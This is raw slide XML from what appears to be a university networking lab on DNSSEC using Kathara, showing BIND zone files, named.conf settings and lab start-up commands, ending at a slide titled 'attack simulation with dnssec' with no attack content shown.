              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre.uniroma3.it. IN  A   110.0.0.50</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>www.uniroma3.it.        IN  CNAME uniromatre.uniroma3.it.</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F7531314-639C-C9C7-F41F-102CF14D4586}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2801" cy="124"/>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nsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/etc/bind/db.uniroma3</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9DD1151C-7E11-6E1A-8A82-65FF4462CBF3}"/>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153ECC74-F122-DA64-F24F-3E87DC650973}"/>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9C0866F9-C5EB-61F6-D26F-1B2346920FA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5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD4BB8C1-1617-DF4A-FCF0-7684A0E7B995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="4920435"/>
            <a:ext cx="6116028" cy="1143000"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE25B7A-6825-9FCE-8847-55F64D84832E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>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IN  NS    ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.        IN  A     10.0.3.5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEAC8040-E002-7272-B478-A67E83247F58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3018" cy="248"/>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nsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/etc/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</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515963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D22F6-9194-7277-936F-03AB85A9C343}"/>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988A7B99-C976-A16D-A563-69C9591B001B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1235548"/>
            <a:ext cx="7145435" cy="4025957"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF643F35-433B-50DC-0F8E-8410D2431345}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="96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include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named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>”;</a:t>
              </a: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zone “.” {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    type hint;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file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zone “uniroma3.it” {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    type master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file “/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/db.uniroma3”;</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dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;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inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41061D80-67C3-60E3-3D3D-3A20079433CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3133" cy="13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nsuni</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56B3574D-7185-9101-B3F4-AF70EFF08D78}"/>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EBABF3A6-17FB-7E89-4E6A-CDD445148FD2}"/>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888A92FB-5FB3-3147-0339-E7D605FEEB0F}"/>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1056187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F35CB-3D67-9032-C417-43A14F646351}"/>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B196AE6A-31F4-9DB5-D8C7-3DB75713DF92}"/>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9D08904C-4F13-E03B-28F8-0C762963996D}"/>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84A1823C-F930-BA5D-CE98-6AA4CFFB4378}"/>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5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C0C1612-7308-EC0B-4188-0BE0DC768786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2282726"/>
            <a:ext cx="7087578" cy="2292548"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03895F9B-2367-7D03-A2E9-2625EAF19754}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="94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eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory "/var/cache/bind";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    key-directory "/var/cache/bind/keys";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-recursion { 110.0.0.0/24; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-validation no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    listen-on-v6 { none; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA29FAD-DE08-093F-E31E-F2FEBCC1F9EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3837"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nsuni</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named.conf.options</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1096050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AB78B-3AD1-9016-506C-5B592047A5B7}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D964FB-D0F3-50BB-916A-ED8B631B3234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>tart the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F6B3B4-08AA-A333-BA4C-1B561186D3EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>start the lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3001 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9E53D95-56E8-DDBB-D191-97B0EBD32A49}"/>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04E71B68-D33E-E0FF-8CC1-E4AE4D219B47}"/>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31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A02AD9D-D683-BF6F-CD78-52CB470D1A0D}"/>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7B1F9FC2-2DB8-EF70-68E7-4B95F93C0A1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799"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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cd </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lstart</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{323CD645-B655-0E77-1F70-CA8D912E3A38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="2894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AF288531-C8B1-DE40-A68D-18C3DEC5296E}"/>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A833EC70-35E8-9830-1F48-9F67336E57C8}"/>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8" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAF1D0A2-87B2-A717-0188-E07C1C922682}"/>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7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CACF6AC1-ED75-9963-3E50-6E60C28ECF5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42758872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2ABEE-2F81-7303-F49D-41F081722AAA}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE46F0B-E660-3492-A85C-6F1D7AFFC56F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack simulation with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5A03AA-68BF-918B-7D3E-D88B4869A7DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
